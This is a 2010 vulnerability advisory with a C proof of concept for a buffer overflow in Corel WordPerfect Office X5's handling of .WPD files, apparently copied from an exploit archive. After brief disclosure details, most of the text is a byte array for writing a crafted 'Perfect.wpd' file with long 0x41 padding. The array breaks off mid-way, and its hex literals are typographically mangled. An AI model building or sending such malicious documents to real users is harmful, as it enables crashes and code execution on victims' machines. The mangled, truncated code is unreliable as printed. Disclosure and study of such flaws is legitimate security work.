Corel WordPerfect Office X5 15.0.0.357 (wpd) Buffer Overflow PoC

Jul.12, 2010 in Exploits

<!DOCTYPE HTML PUBLIC ‘-//W3C//DTD HTML 4.01 Transitional//EN’><html><head><meta http-equiv=’Content-Type’ content=’text/html; charset=windows-1251′><title>Corel WordPerfect Office X5 15.0.0.357 (wpd) Buffer Overflow PoC</title><link rel=’shortcut icon’ href=’/favicon.ico’ type=’image/x-icon’><link rel=’alternate’ type=’application/rss+xml’ title=’Inj3ct0r RSS’ href=’/rss’></head><body><pre>================================================================
Corel WordPerfect Office X5 15.0.0.357 (wpd) Buffer Overflow PoC
================================================================

– Title: Corel WordPerfect Office X5 15.0.0.357 (wpd) Remote Buffer Preoccupation PoC

– Vendor: Corel Corporation

– Product Web Page: http://www.corel.com

– Version Tested: 15.0.0.357 (Standard Edition)

– Summary: Corel® WordPerfect® Office X5 ? Standard Edition is the essential
office suite for word processing, spreadsheets, presentations and email.
Chosen over Microsoft® Office by millions of longtime users, it integrates
the latest productivity software with the best of the Web. Work faster and
collaborate more efficiently with all-new Web services, new Microsoft® Office
SharePoint® support, more PDF tools and even better compatibility with Microsoft
Office. It’s everything you expect in an office suite?for less.

– Desc: Corel WordPerfect is prone to a remote buffer overflow vulnerability because
the application fails to perform adequate boundary checks on user supplied input with
.WPD (WordPerfect Document) file. Attackers may exploit this issue to execute arbitrary
code in the context of the application. Failed attacks will cause denial-of-service
conditions.

– Tested On: Microsoft Windows XP Professional SP3 (English)

– Vulnerability Discovered By: Gjoko ‘LiquidWorm’ Krstic

– liquidworm gmail com

– Zero Science Lab – http://www.zeroscience.mk

– 09.07.2010

– Vendor status:

[09.07.2010] Vulnerability discovered.
[09.07.2010] Initial contact with the vendor.
[12.07.2010] No reply from vendor.
[12.07.2010] Public advisory released.

– Zero Science Lab Advisory ID: ZSL-2010-4945

– Advisory: http://www.zeroscience.mk/en/vulnerabilities/ZSL-2010-4945.php

– PoC:

#include <stdio.h>
#include <string.h>
#include <stdlib.h>
#include <stdint.h>

#define OCCUPANT "Perfect.wpd"

FILE *corel;

char payload[] = {

0xFF, 0×57, 0×50, 0×43, 0xA5, 0×06, 0×00, 0×00, 0×01, 0×0A, 0×02, 0×01, 0×00, 0×00, 0×00, 0×02,
0×05, 0×00, 0×00, 0×00, 0×12, 0×07, 0×00, 0×00, 0×00, 0×02, 0×00, 0×00, 0xE6, 0×64, 0×81, 0xA9,
0×63, 0xAA, 0×00, 0xE6, 0×82, 0xAD, 0×38, 0×49, 0×9F, 0xC6, 0×5B, 0×03, 0×23, 0×6B, 0×12, 0xE6,
0×8F, 0xFA, 0×3C, 0xDA, 0×1F, 0xB0, 0×79, 0×47, 0xEE, 0×86, 0xE2, 0×12, 0×37, 0×36, 0xB8, 0xAA,
0×20, 0×2E, 0xCF, 0×14, 0xBE, 0×54, 0×3E, 0xF8, 0×21, 0xB7, 0×4A, 0×27, 0xBC, 0×72, 0×27, 0xE8,
0×7D, 0×0E, 0×13, 0xC3, 0×16, 0×43, 0xC6, 0×9D, 0xBA, 0xCD, 0xF7, 0×44, 0xF3, 0×06, 0×5D, 0×47,
0×75, 0xA3, 0×86, 0×79, 0xBD, 0×10, 0×0E, 0×80, 0×7A, 0×7E, 0×0F, 0xDD, 0×3F, 0×93, 0xF8, 0×73,
0×84, 0×8C, 0×8B, 0xC1, 0xFA, 0×1D, 0xEC, 0×78, 0×76, 0×38, 0xF3, 0×63, 0×33, 0xCF, 0xEC, 0xAF,
0×44, 0xE3, 0×84, 0xD4, 0×3D, 0×89, 0xC7, 0×94, 0xD8, 0×2C, 0×55, 0×35, 0xDE, 0×72, 0×78, 0×73,
0×6A, 0×7D, 0xE6, 0×99, 0xB6, 0×6B, 0×77, 0xB6, 0×82, 0×09, 0×55, 0xE7, 0×32, 0×3A, 0×26, 0×24,
0×27, 0×1C, 0×0E, 0×5A, 0×63, 0xC1, 0×81, 0×00, 0xBA, 0xEE, 0xD6, 0×67, 0×1D, 0xD1, 0xBF, 0×4E,
0×42, 0×63, 0×9D, 0×4E, 0×67, 0×51, 0×96, 0×8D, 0xF9, 0×9F, 0×1D, 0xC7, 0×30, 0×85, 0×80, 0xCB,
0×94, 0xF7, 0xA7, 0×6F, 0×4C, 0xCF, 0×6A, 0×8F, 0×20, 0×14, 0×66, 0xD1, 0×9B, 0×76, 0×7A, 0×04,
0×8D, 0xC3, 0×4C, 0×11, 0xC5, 0×48, 0×98, 0×8F, 0×64, 0xA5, 0×13, 0×9F, 0xD2, 0×7D, 0×80, 0×31,
0xA3, 0xC6, 0×51, 0×89, 0×03, 0×3E, 0xC9, 0xB2, 0×67, 0×2E, 0×19, 0xB7, 0×28, 0×23, 0xB8, 0×92,
0xF4, 0xA2, 0×90, 0×6D, 0×6B, 0xE3, 0×9C, 0×7F, 0xC8, 0×42, 0×1A, 0×14, 0×0F, 0×3C, 0×40, 0xD9,
0×79, 0×73, 0xA0, 0×65, 0xDD, 0×83, 0×1D, 0×22, 0×42, 0×8D, 0xC1, 0×35, 0×9F, 0xA9, 0×32, 0×50,
0xD4, 0×1F, 0xBA, 0xB5, 0×7B, 0xF6, 0×43, 0×22, 0×7C, 0×7C, 0×32, 0xFF, 0×8E, 0xB7, 0xDD, 0xC3,
0×9A, 0xE1, 0×0E, 0×9E, 0xF1, 0×48, 0xEA, 0xE2, 0xA2, 0xFD, 0xE8, 0×79, 0×87, 0×7A, 0×74, 0×3C,
0×65, 0×76, 0×73, 0×10, 0×18, 0×9D, 0xC9, 0×96, 0×10, 0×9B, 0xEA, 0×6F, 0×16, 0×5A, 0xF6, 0×23,
0xFB, 0xEB, 0xDA, 0×42, 0×0D, 0×33, 0×5A, 0xD7, 0×57, 0xEF, 0×7F, 0xAE, 0×95, 0xCC, 0xEF, 0×65,
0×19, 0×8E, 0xB9, 0×3D, 0xBF, 0×55, 0xC2, 0×32, 0×72, 0×2B, 0×8C, 0xDD, 0×2D, 0×3D, 0×32, 0×53,
0×24, 0×18, 0×3E, 0×02, 0xDE, 0xC4, 0xB9, 0xC0, 0xDA, 0×05, 0×9A, 0xD3, 0×5F, 0×80, 0xF2, 0xB6,
0xCD, 0×1C, 0×91, 0×71, 0xF0, 0xC9, 0×61, 0×7D, 0×72, 0×82, 0×99, 0×81, 0xA6, 0×41, 0×58, 0×3D,
0xC0, 0×11, 0xCF, 0×61, 0×25, 0×5A, 0×54, 0xC9, 0×14, 0×8F, 0×46, 0×16, 0×0C, 0×6B, 0xA9, 0×6D,
0xA3, 0×30, 0xA1, 0xA3, 0xAB, 0×7D, 0xA9, 0×0C, 0×46, 0×57, 0xEB, 0×61, 0×7B, 0×7B, 0×5C, 0×45,
0xDC, 0xA1, 0×20, 0×75, 0×57, 0×2D, 0xEC, 0xDE, 0xEA, 0×12, 0×68, 0×38, 0×48, 0xC7, 0xC6, 0xC1,
0×0D, 0xEF, 0xBA, 0×26, 0×53, 0xF5, 0xB7, 0xF5, 0×7D, 0×2A, 0×60, 0xD5, 0xB7, 0xE2, 0×29, 0×95,
0×37, 0×6C, 0xF9, 0xF8, 0×61, 0×62, 0×02, 0×98, 0xDD, 0xDE, 0×42, 0×31, 0×28, 0xE6, 0xFD, 0xBE,
0xB7, 0xCC, 0×9F, 0×47, 0xFF, 0×7C, 0×78, 0xA3, 0×12, 0×85, 0×35, 0×3C, 0xE3, 0xC0, 0xD5, 0×68,
0×68, 0×69, 0xDB, 0xF4, 0xC2, 0xF7, 0×7E, 0xD7, 0xA6, 0×76, 0xA2, 0×85, 0×04, 0×5A, 0×6C, 0×14,
0xB4, 0×68, 0×49, 0xD0, 0xE9, 0×76, 0×76, 0×27, 0×54, 0×20, 0xEC, 0xCD, 0×3A, 0×55, 0×4E, 0×7F,
0×02, 0×00, 0×0C, 0×00, 0×00, 0×00, 0×00, 0×00, 0×00, 0×00, 0×00, 0×00, 0×00, 0×00, 0×08, 0×23,
0×01, 0×00, 0×00, 0×00, 0xC9, 0×02, 0×00, 0×00, 0xA8, 0×02, 0×00, 0×00, 0×00, 0×55, 0×01, 0×00,
0×00, 0×00, 0×4E, 0×00, 0×00, 0×00, 0×71, 0×05, 0×00, 0×00, 0×09, 0×25, 0×01, 0×00, 0×00, 0×00,
0×06, 0×00, 0×00, 0×00, 0xBF, 0×05, 0×00, 0×00, 0×0B, 0×30, 0×02, 0×00, 0×00, 0×00, 0×3A, 0×00,
0×00, 0×00, 0xC5, 0×05, 0×00, 0×00, 0×08, 0xE0, 0×01, 0×00, 0×00, 0×00, 0×5A, 0×00, 0×00, 0×00,
0xFF, 0×05, 0×00, 0×00, 0×08, 0×5E, 0×01, 0×00, 0×00, 0×00, 0×0C, 0×00, 0×00, 0×00, 0×59, 0×06,
0×00, 0×00, 0×08, 0×77, 0×01, 0×00, 0×00, 0×00, 0×04, 0×00, 0×00, 0×00, 0×65, 0×06, 0×00, 0×00,
0×08, 0×34, 0×01, 0×00, 0×00, 0×00, 0×14, 0×00, 0×00, 0×00, 0×69, 0×06, 0×00, 0×00, 0×08, 0×02,
0×01, 0×00, 0×00, 0×00, 0×0F, 0×00, 0×00, 0×00, 0×7D, 0×06, 0×00, 0×00, 0×08, 0×10, 0×01, 0×00,
0×00, 0×00, 0×02, 0×00, 0×00, 0×00, 0×8C, 0×06, 0×00, 0×00, 0×09, 0×41, 0×41, 0×41, 0×41, 0×41,
0×41, 0×41, 0×41, 0×41, 0×41, 0×41, 0×41, 0×41, 0×41, 0×41, 0×41, 0×41, 0×41, 0×41, 0×41, 0×41,
0×41, 0×41, 0×41, 0×41, 0×41, 0×41, 0×41, 0×41, 0×41, 0×41, 0×41, 0×41, 0×41, 0×41, 0×41, 0×41,
0×41, 0×41, 0×41, 0×41, 0×41, 0×41, 0×41, 0×41, 0×41, 0×41, 0×41, 0×41, 0×41, 0×41, 0×41, 0×41,
0×41, 0×41, 0×41, 0×41, 0×41, 0×41, 0×41, 0×41, 0×41, 0×41, 0×41, 0×41, 0×41, 0×41, 0×41, 0×41,
0×41, 0×41, 0×41, 0×41, 0×41, 0×41, 0×41, 0×41, 0×41, 0×41, 0×41, 0×41, 0×41, 0×41, 0×41, 0×41,
0×41, 0×41, 0×41, 0×41, 0×41, 0×41, 0×41, 0×41, 0×41, 0×41, 0×41, 0×41, 0×41, 0×41, 0×41, 0×41,
0×41, 0×41, 0×41, 0×41, 0×41, 0×41, 0×41, 0×41, 0×41, 0×41, 0×41, 0×41, 0×41, 0×41, 0×41, 0×41,
0×41, 0×41, 0×41, 0×41, 0×41, 0×41, 0×41, 0×41, 0×41, 0×41, 0×41, 0×41, 0×41, 0×41, 0×41, 0×41,
0×41, 0×41, 0×41, 0×41, 0×41, 0×41, 0×41, 0×41, 0×41, 0×41, 0×41, 0×41, 0×41, 0×41, 0×41, 0×41,
0×41, 0×41, 0×41, 0×41, 0×41, 0×41, 0×41, 0×41, 0×41, 0×41, 0×41, 0×41, 0×41, 0×41, 0×41, 0×41,
0×41, 0×41, 0×41, 0×41, 0×41, 0×41, 0×41, 0×41, 0×41, 0×41, 0×41, 0×41, 0×41, 0×41, 0×41, 0×41,
0×41, 0×41, 0×41, 0×41, 0×41, 0×41, 0×41, 0×41, 0×41, 0×41, 0×41, 0×41, 0×41, 0×41, 0×41, 0×41,
0×41, 0×41, 0×41, 0×41, 0×41, 0×41, 0×41, 0×41, 0×41, 0×41, 0×41, 0×41, 0×41, 0×41, 0×41, 0×41,
0×41, 0×41, 0×41, 0×41, 0×41, 0×41, 0×41, 0×41, 0×41, 0×41, 0×41, 0×41, 0×41, 0×41, 0×41, 0×41,
0×41, 0×41, 0×41, 0×41, 0×41, 0×41, 0×41, 0×41, 0×41, 0×41, 0×41, 0×41, 0×41, 0×41, 0×41, 0×41,
0×41, 0×41, 0×41, 0×41, 0×41, 0×41, 0×41, 0×41, 0×41, 0×41, 0×41, 0×41, 0×41, 0×41, 0×41, 0×41,
0×41, 0×41, 0×41, 0×41, 0×41, 0×41, 0×41, 0×41, 0×41, 0×41, 0×41, 0×41, 0×41, 0×41, 0×41, 0×41,
0×41, 0×41, 0×41, 0×41, 0×41, 0×41, 0×41, 0×41, 0×41, 0×41, 0×41, 0×41, 0×41, 0×41, 0×41, 0×41,
0×41, 0×41, 0×41, 0×41, 0×41, 0×41, 0×41, 0×41, 0×41, 0×41, 0×41, 0×41, 0×41, 0×41, 0×41, 0×41,
0×41, 0×41, 0×41, 0×41, 0×41, 0×41, 0×41, 0×41, 0×41, 0×41, 0×41, 0×41, 0×41, 0×41, 0×41, 0×41,
0×41, 0×41, 0×41, 0×41, 0×41, 0×41, 0×41, 0×41, 0×41, 0×41, 0×41, 0×41, 0×41, 0×41, 0×41, 0×41,
0×41, 0×41, 0×41, 0×41, 0×41, 0×41, 0×41, 0×41, 0×41, 0×41, 0×41, 0×41, 0×41, 0×41, 0×41, 0×41,
0×41, 0×41, 0×41, 0×41, 0×41, 0×41, 0×41, 0×41, 0×41, 0×41, 0×41, 0×41, 0×41, 0×41, 0×41, 0×41,
0×41, 0×41, 0×41, 0×41, 0×41, 0×41, 0×41, 0×41, 0×41, 0×41, 0×41, 0×41, 0×41, 0×41, 0×41, 0×41,
0×41, 0×41, 0×41, 0×41, 0×41, 0×41, 0×41, 0×41, 0×41, 0×41, 0×41, 0×41, 0×41, 0×41, 0×41, 0×41,
0×41, 0×41, 0×41, 0×41, 0×41, 0×41, 0×41, 0×41, 0×41, 0×41, 0×41, 0×41, 0×41, 0×41, 0×41, 0×41,
0×41, 0×41, 0×41, 0×41, 0×41, 0×41, 0×41, 0×41, 0×41, 0×41, 0×41, 0×41, 0×41, 0×41, 0×41, 0×41,
0×41, 0×41, 0×41, 0×41, 0×41, 0×41, 0×41, 0×41, 0×41, 0×41, 0×41, 0×41, 0×41, 0×41, 0×41, 0×41,
0×41, 0×41, 0×41, 0×41, 0×41, 0×41, 0×41, 0×41, 0×41, 0×41, 0×41, 0×41, 0×41, 0×41, 0×41, 0×41,
0×41, 0×41, 0×41, 0×41, 0×41, 0×41, 0×41, 0×41, 0×41, 0×41, 0×41, 0×41, 0×41, 0×41, 0×41, 0×41,
0×41, 0×41, 0×41, 0×41, 0×41, 0×41, 0×41, 0×41, 0×41, 0×41, 0×41, 0×41, 0×41, 0×41, 0×41, 0×41,
0×41, 0×41, 0×41, 0×41, 0×41, 0×41, 0×41, 0×41, 0×41, 0×41, 0×41, 0×41, 0×41, 0×41, 0×41, 0×41,
0×41, 0×41, 0×41, 0×41, 0×41, 0×41, 0×41, 0×41, 0×41, 0×41, 0×41, 0×41, 0×41, 0×41, 0×41, 0×41,
0×41, 0×41, 0×41, 0×41, 0×41, 0×41, 0×41, 0×41, 0×41, 0×41, 0×41, 0×41, 0×41, 0×41, 0×41, 0×41,
0×41, 0×41, 0×41, 0×41, 0×41, 0×41, 0×41, 0×41, 0×41, 0×41, 0×41, 0×41, 0×41, 0×41, 0×41, 0×41,
0×41, 0×41, 0×41, 0×41, 0×41, 0×41, 0×41, 0×41, 0×41, 0×41, 0×41, 0×41, 0×41, 0×41, 0×41, 0×41,
0×41, 0×41, 0×41, 0×41, 0×41, 0×41, 0×41, 0×41, 0×41, 0×41, 0×41, 0×41, 0×41, 0×41, 0×41, 0×41,
0×41, 0×41, 0×41, 0×41, 0×41, 0×41, 0×41, 0×41, 0×41, 0×41, 0×41, 0×41, 0×41, 0×41, 0×41, 0×41,
0×41, 0×41, 0×41, 0×41, 0×41, 0×41, 0×41, 0×41, 0×41, 0×41, 0×41, 0×41, 0×41, 0×41, 0×41, 0×41,
0×41, 0×41, 0×41, 0×41, 0×41, 0×41, 0×41, 0×41, 0×41, 0×41, 0×41, 0×41, 0×41, 0×41, 0×41, 0×41,
0×41, 0×41, 0×41, 0×41, 0×41, 0×41, 0×41, 0×41, 0×41, 0×41, 0×41, 0×41, 0×41, 0×41, 0×41, 0×41,
0×41, 0×41, 0×41, 0×41, 0×41, 0×41, 0×41, 0×41, 0×41, 0×41, 0×41, 0×41, 0×41, 0×41, 0×41, 0×41,
0×41, 0×41, 0×41, 0×41, 0×41, 0×41, 0×41, 0×41, 0×41, 0×41, 0×41, 0×41, 0×41, 0×41, 0×41, 0×41,
0×41, 0×41, 0×41, 0×41, 0×41, 0×41, 0×41, 0×41, 0×41, 0×41, 0×41, 0×41, 0×41, 0×41, 0×41, 0×41,
0×41, 0×41, 0×41, 0×41, 0×41, 0×41, 0×41, 0×41, 0×41, 0×41, 0×41, 0×41, 0×41, 0×41, 0×41, 0×41,
0×41, 0×41, 0×41, 0×41, 0×41, 0×41, 0×41, 0×41, 0×41, 0×41, 0×41, 0×41, 0×41, 0×41, 0×41, 0×41,
0×41, 0×41, 0×41, 0×41, 0×41, 0×41, 0×41, 0×41, 0×41, 0×41, 0×41, 0×41, 0×41, 0×41, 0×41, 0×41,
0×41, 0×41, 0×41, 0×41, 0×41, 0×41, 0×41, 0×41, 0×41, 0×41, 0×41, 0×41, 0×41, 0×41, 0×41, 0×41,
0×41, 0×41, 0×41, 0×41, 0×41, 0×41, 0×41, 0×41, 0×41, 0×41, 0×41, 0×41, 0×41, 0×41, 0×41, 0×41,
0×41, 0×41, 0×41, 0×41, 0×41, 0×41, 0×41, 0×41, 0×41, 0×41, 0×41, 0×41, 0×41, 0×41, 0×41, 0×41,
0×41, 0×41, 0×41, 0×41, 0×41, 0×41, 0×41, 0×41, 0×41, 0×41, 0×41, 0×41, 0×41, 0×41, 0×41, 0×41,
0×41, 0×41, 0×41, 0×41, 0×41, 0×41, 0×41, 0×41, 0×41, 0×41, 0×41, 0×41, 0×41, 0×41, 0×41, 0×41,
0×41, 0×41, 0×41, 0×41, 0×41, 0×41, 0×41, 0×41, 0×41, 0×41, 0×41, 0×41, 0×41, 0×41, 0×41, 0×41,
0×41, 0×41, 0×41, 0×41, 0×41, 0×41, 0×41, 0×41, 0×41, 0×41, 0×41, 0×41, 0×41, 0×41, 0×41, 0×41,
0×41, 0×41, 0×41, 0×41, 0×41, 0×41, 0×41, 0×41, 0×41, 0×41, 0×41, 0×41, 0×41, 0×41, 0×41, 0×41,
0×41, 0×41, 0×41, 0×41, 0×41, 0×41, 0×41, 0×41, 0×41, 0×41, 0×41, 0×41, 0×41, 0×41, 0×41, 0×41,
0×41, 0×41, 0×41, 0×41, 0×41, 0×41, 0×41, 0×41, 0×41, 0×41, 0×41, 0×41, 0×41, 0×41, 0×41, 0×41,
0×41, 0×41, 0×41, 0×41, 0×41, 0×41, 0×41, 0×41, 0×41, 0×41, 0×41, 0×41, 0×41, 0×41, 0×41, 0×41,
0×41, 0×41, 0×41, 0×41, 0×41, 0×41, 0×41, 0×41, 0×41, 0×41, 0×41, 0×41, 0×41, 0×41, 0×41, 0×41,
0×41, 0×41, 0×41, 0×41, 0×41, 0×41, 0×41, 0×41, 0×41, 0×41, 0×41, 0×41, 0×41, 0×41, 0×41, 0×41,
0×41, 0×41, 0×41, 0×41, 0×41, 0×41, 0×41, 0×41, 0×41, 0×41, 0×41, 0×41, 0×41, 0×41, 0×41, 0×41,
0×41, 0×41, 0×41, 0×41, 0×41, 0×41, 0×41, 0×41, 0×41, 0×41, 0×41, 0×41, 0×41, 0×41, 0×41, 0×41,
0×41, 0×41, 0×41, 0×6D, 0×01, 0×00, 0×00, 0×00, 0×17, 0×00, 0×00, 0×00, 0×8E, 0×06, 0×00, 0×00,
0×00, 0×98, 0×00, 0×00, 0×00, 0×00, 0×00, 0×00, 0×00, 0×00, 0×00, 0×00, 0×00, 0×00, 0×00, 0×00,
0×00, 0×00, 0×00, 0×00, 0×00, 0×00, 0×00, 0×00, 0×00, 0×00, 0×00, 0×00, 0×00, 0×00, 0×00, 0×00,
0×00, 0×00, 0×00, 0×00, 0×00, 0×00, 0×00, 0×00, 0×00, 0×00, 0×00, 0×00, 0×00, 0×00, 0×00, 0×00,
0×00, 0×00, 0×00, 0×00, 0×00, 0×00, 0×00, 0×00, 0×00, 0×00, 0×00, 0×00, 0×00, 0×00, 0×00, 0×00,
0×00, 0×00, 0×00, 0×00, 0×00, 0×00, 0×00, 0×00, 0×00, 0×00, 0×00, 0×00, 0×00, 0×00, 0×00, 0×00,
0×00, 0×00, 0×00, 0×00, 0×00, 0×00, 0×00, 0×00, 0×00, 0×00, 0×00, 0×00, 0×00, 0×00, 0×00, 0×00,
0×00, 0×00, 0×00, 0×00, 0×00, 0×00, 0×00, 0×00, 0×00, 0×00, 0×00, 0×00, 0×00, 0×00, 0×00, 0×00,
0×00, 0×00, 0×00, 0×00, 0×00, 0×00, 0×00, 0×00, 0×00, 0×00, 0×00, 0×00, 0×00, 0×00, 0×00, 0×00,
0×00, 0×00, 0×00, 0×00, 0×00, 0×00, 0×00, 0×00, 0×00, 0×00, 0×00, 0×00, 0×00, 0×00, 0×00, 0×00,
0×00, 0×00, 0×00, 0×00, 0×00, 0×00, 0×00, 0×00, 0×00, 0×00, 0×00, 0×00, 0×00, 0×00, 0×00, 0×00,
0×00, 0×00, 0×00, 0×00, 0×00, 0×00, 0×00, 0×00, 0×00, 0×00, 0×00, 0×00, 0×00, 0×00, 0×00, 0×00,
0×00, 0×00, 0×00, 0×00, 0×00, 0×00, 0×00, 0×00, 0×00, 0×00, 0×00, 0×00, 0×00, 0×00, 0×00, 0×00,
0×00, 0×00, 0×00, 0×00, 0×00, 0×00, 0×00, 0×00, 0×00, 0×00, 0×00, 0×00, 0×00, 0×00, 0×00, 0×00,
0×00, 0×00, 0×00, 0×00, 0×00, 0×00, 0×00, 0×00, 0×00, 0×00, 0×00, 0×00, 0×00, 0×00, 0×00, 0×00,
0×00, 0×00, 0×00, 0×00, 0×00, 0×00, 0×00, 0×00, 0×00, 0×00, 0×00, 0×00, 0×00, 0×00, 0×00, 0×00,
0×00, 0×00, 0×00, 0×00, 0×00, 0×00, 0×00, 0×00, 0×00, 0×00, 0×00, 0×00, 0×00, 0×00, 0×00, 0×00,
0×00, 0×00, 0×00, 0×00, 0×00, 0×00, 0×00, 0×00, 0×00, 0×00, 0×00, 0×00, 0×00, 0×00, 0×00, 0×00,
0×00, 0×00, 0×00, 0×00, 0×00, 0×00, 0×00, 0×00, 0×00, 0×00, 0×00, 0×00, 0×00, 0×00, 0×00, 0×00,
0×00, 0×00, 0×00, 0×00, 0×00, 0×00, 0×00, 0×00, 0×00, 0×00, 0×00, 0×00, 0×00, 0×00, 0×00, 0×00,
0×00, 0×00, 0×00, 0×00, 0×00, 0×00, 0×00, 0×00, 0×00, 0×00, 0×00, 0×00, 0×00, 0×00, 0×00, 0×00,
0×00, 0×00, 0×00, 0×00, 0×00, 0×00, 0×00, 0×00, 0×00, 0×00, 0×00, 0×00, 0×00, 0×00, 0×00, 0×00,
0×00, 0×00, 0×00, 0×00, 0×00, 0×00, 0×00, 0×00, 0×00, 0×00, 0×00, 0×00, 0×00, 0×00, 0×00, 0×00,
0×00, 0×00, 0×00, 0×00, 0×00, 0×00, 0×00, 0×00, 0×00, 0×00, 0×00, 0×00, 0×00, 0×00, 0×00, 0×00,
0×00, 0×00, 0×00, 0×00, 0×00, 0×00, 0×00, 0×00, 0×00, 0×00, 0×00, 0×00, 0×00, 0×00, 0×00, 0×00,
0×00, 0×00, 0×00, 0×00, 0×00, 0×00, 0×00, 0×00, 0×00, 0×00, 0×00, 0×00, 0×00, 0×00, 0×00, 0×00,
0×00, 0×00, 0×00, 0×00, 0×00, 0×00, 0×00, 0×00, 0×00, 0×00, 0×00, 0×00, 0×00, 0×00, 0×00, 0×00,
0×00, 0×00, 0×00, 0×00, 0×00, 0×00, 0×00, 0×00, 0×00, 0×00, 0×00, 0×00, 0×00, 0×00, 0×00, 0×00,
0×00, 0×00, 0×00, 0×00, 0×00, 0×00, 0×00, 0×00, 0×00, 0×00, 0×00, 0×00, 0×00, 0×00, 0×00, 0×00,
0×00, 0×00, 0×00, 0×00, 0×00, 0×00, 0×00, 0×00, 0×00, 0×00, 0×00, 0×00, 0×00, 0×00, 0×00, 0×00,
0×00, 0×00, 0×00, 0×00, 0×00, 0×00, 0×00, 0×00, 0×00, 0×00, 0×00, 0×00, 0×00, 0×00, 0×00, 0×00,
0×00, 0×00, 0×00, 0×00, 0×00, 0×00, 0×00, 0×00, 0×00, 0×00, 0×00, 0×00, 0×00, 0×00, 0×00, 0×00,
0×00, 0×00, 0×00, 0×00, 0×00, 0×00, 0×00, 0×00, 0×00, 0×00, 0×00, 0×00, 0×00, 0×00, 0×00, 0×00,
0×00, 0×00, 0×00, 0×00, 0×00, 0×00, 0×00, 0×00, 0×00, 0×00, 0×00, 0×00, 0×00, 0×00, 0×00, 0×00,
0×00, 0×00, 0×00, 0×00, 0×00, 0×00, 0×00, 0×0A, 0×00, 0×0A, 0×00, 0×0A, 0×00, 0×0A, 0×00, 0×0A,
0×00, 0×0A, 0×00, 0×0A, 0×00, 0×0A, 0×00, 0×30, 0×00, 0×00, 0×00, 0×00, 0×00, 0×00, 0×00, 0×00,
0×00, 0×00, 0×00, 0×00, 0×00, 0×00, 0×00, 0×00, 0×00, 0×00, 0×00, 0×00, 0×00, 0×00, 0×00, 0×00,
0×00, 0×00, 0×00, 0×00, 0×00, 0×00, 0×00, 0×00, 0×00, 0×00, 0×00, 0×00, 0×00, 0×00, 0×00, 0×00,
0×00, 0×00, 0×00, 0×00, 0×00, 0×00, 0×00, 0×00, 0×00, 0×00, 0×00, 0×00, 0×00, 0×00, 0×00, 0×00,
0×00, 0×00, 0×00, 0×00, 0×00, 0×00, 0×00, 0×00, 0×00, 0×00, 0×00, 0×00, 0×00, 0×00, 0×00, 0×00,
0×00, 0×00, 0×00, 0×00, 0×00, 0×00, 0×00, 0×00, 0×00, 0×00, 0×00, 0×00, 0×00, 0×00, 0×00, 0×00,
0×00, 0×00, 0×00, 0×00, 0×00, 0×00, 0×00, 0×00, 0×00, 0×00, 0×00, 0×00, 0×00, 0×00, 0×00, 0×00,
0×00, 0×00, 0×00, 0×00, 0×00, 0×00, 0×00, 0×00, 0×00, 0×00, 0×00, 0×00, 0×00, 0×00, 0×00, 0×00,
0×00, 0×00, 0×00, 0×00, 0×00, 0×00, 0×00, 0×00, 0×00, 0×00, 0×00, 0×00, 0×00, 0×00, 0×00, 0×00,
0×00, 0×00, 0×00, 0×00, 0×00, 0×00, 0×00, 0×00, 0×00, 0×00, 0×00, 0×00, 0×00, 0×00, 0×00, 0×00,
0×00, 0×00, 0×00, 0×00, 0×00, 0×00, 0×00, 0×00, 0×00, 0×26, 0×00, 0xD6, 0×1E, 0×64, 0×0E, 0×39,
0×08, 0×00, 0×00, 0xCC, 0×09, 0×00, 0×0A, 0×00, 0×5A, 0×00, 0×1B, 0×01, 0×00, 0×8B, 0×14, 0×36,
0×00, 0×54, 0×00, 0×69, 0×00, 0×6D, 0×00, 0×65, 0×00, 0×73, 0×00, 0×20, 0×00, 0×4E, 0×00, 0×65,
0×00, 0×77, 0×00, 0×20, 0×00, 0×52, 0×00, 0×6F, 0×00, 0×6D, 0×00, 0×61, 0×00, 0×6E, 0×00, 0×20,
0×00, 0×52, 0×00, 0×65, 0×00, 0×67, 0×00, 0×75, 0×00, 0×6C, 0×00, 0×61, 0×00, 0×72, 0×00, 0×00,
0×00, 0×00, 0×00, 0×00, 0×00, 0×00, 0×00, 0×01, 0×00, 0×02, 0×00, 0×58, 0×02, 0×01, 0×00, 0×00,
0×00, 0×04, 0×00, 0×28, 0×00, 0×00, 0×00, 0×12, 0×00, 0×00, 0×00, 0×00, 0×00, 0×00, 0×00, 0×00,
0×00, 0×00, 0×00, 0×00, 0×00, 0×00, 0×00, 0×01, 0×12, 0xFC, 0×9C, 0×24, 0×00, 0xA1, 0×00, 0×00,
0×00, 0xA1, 0×00, 0×00, 0×00, 0xD4, 0×1C, 0×12, 0×00, 0×00, 0×02, 0×00, 0×55, 0×53, 0×55, 0×53,
0×2E, 0×00, 0×2C, 0×00, 0×12, 0×00, 0xD4, 0×38, 0×00, 0×00, 0×00, 0×0E, 0×00, 0×00, 0×00, 0×08,
0×00, 0×00, 0×00, 0×44, 0×00, 0×6F, 0×00, 0×63, 0×00, 0×75, 0×00, 0×6D, 0×00, 0×65, 0×00, 0×6E,
0×00, 0×74, 0×00, 0×4D, 0×00, 0×61, 0×00, 0×6E, 0×00, 0×61, 0×00, 0×67, 0×00, 0×65, 0×00, 0×6D,
0×00, 0×65, 0×00, 0×6E, 0×00, 0×74, 0×00, 0×3A, 0×00, 0×3A, 0×00, 0×4D, 0×00, 0×6F, 0×00, 0×64,
0×00, 0×69, 0×00, 0×66, 0×00, 0×69, 0×00, 0×65, 0×00, 0×64, 0×00, 0×42, 0×00, 0×6F, 0×00, 0×6F,
0×00, 0×6C, 0×00, 0×65, 0×00, 0×61, 0×00, 0×6E, 0×00, 0×54, 0×00, 0×52, 0×00, 0×55, 0×00, 0×45,
0×00, 0xF7, 0xB0, 0xE8, 0×3C, 0×65, 0×01, 0×00, 0×00, 0×00, 0×00, 0×0F, 0×00, 0×00, 0×00, 0×00,
0×00, 0xAE, 0×00, 0xE9, 0×3C, 0×00, 0×00, 0×00, 0×00, 0xEA, 0×3A, 0×69, 0×10, 0xA2, 0xD7, 0×08,
0×00, 0×2B, 0×30, 0×30, 0×9D, 0×08, 0×33, 0×7C, 0×00, 0×78, 0×00, 0×01, 0×02, 0×00, 0×00, 0×00,
0×00, 0×00, 0×00, 0×03, 0×01, 0×00, 0×02, 0×00, 0×00, 0×00, 0×00, 0×00, 0×00, 0×00, 0×00, 0×00,
0×00, 0×00, 0×00, 0xFF, 0×55, 0×1A, 0×8B, 0xFF, 0×00, 0×00, 0xFF, 0xFF, 0xFF, 0xDD, 0×0A, 0×10,
